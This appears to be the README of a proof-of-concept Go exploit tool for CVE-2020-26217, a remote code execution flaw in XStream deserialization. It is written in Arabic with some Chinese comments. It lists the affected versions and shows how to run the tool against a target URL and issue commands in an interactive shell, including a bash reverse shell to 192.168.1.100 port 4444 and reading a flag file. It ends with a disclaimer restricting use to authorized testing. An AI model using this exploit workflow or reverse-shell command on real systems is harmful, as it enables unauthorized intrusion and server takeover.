
PoC لإلغاء تسلسل XStream (CVE-2020-26217)
أداة استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد في XStream.
CVE-2020-26217 هي ثغرة إلغاء تسلسل في مكتبة XStream، حيث يمكن للمهاجم تشغيل تنفيذ التعليمات البرمجية عن بُعد عبر إنشاء بيانات XML خبيثة.
الإصدارات المتأثرة: XStream <= 1.4.13
go run poc.go <目标URL>
# 运行工具
go run poc.go http://target.com:8080/?data
# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
هذه الأداة مخصصة لأغراض البحث الأمني والاختبار المصرح به فقط، ويُرجى عدم استخدامها لأغراض غير قانونية. يتحمل المستخدم كامل المسؤولية القانونية الناتجة عن ذلك.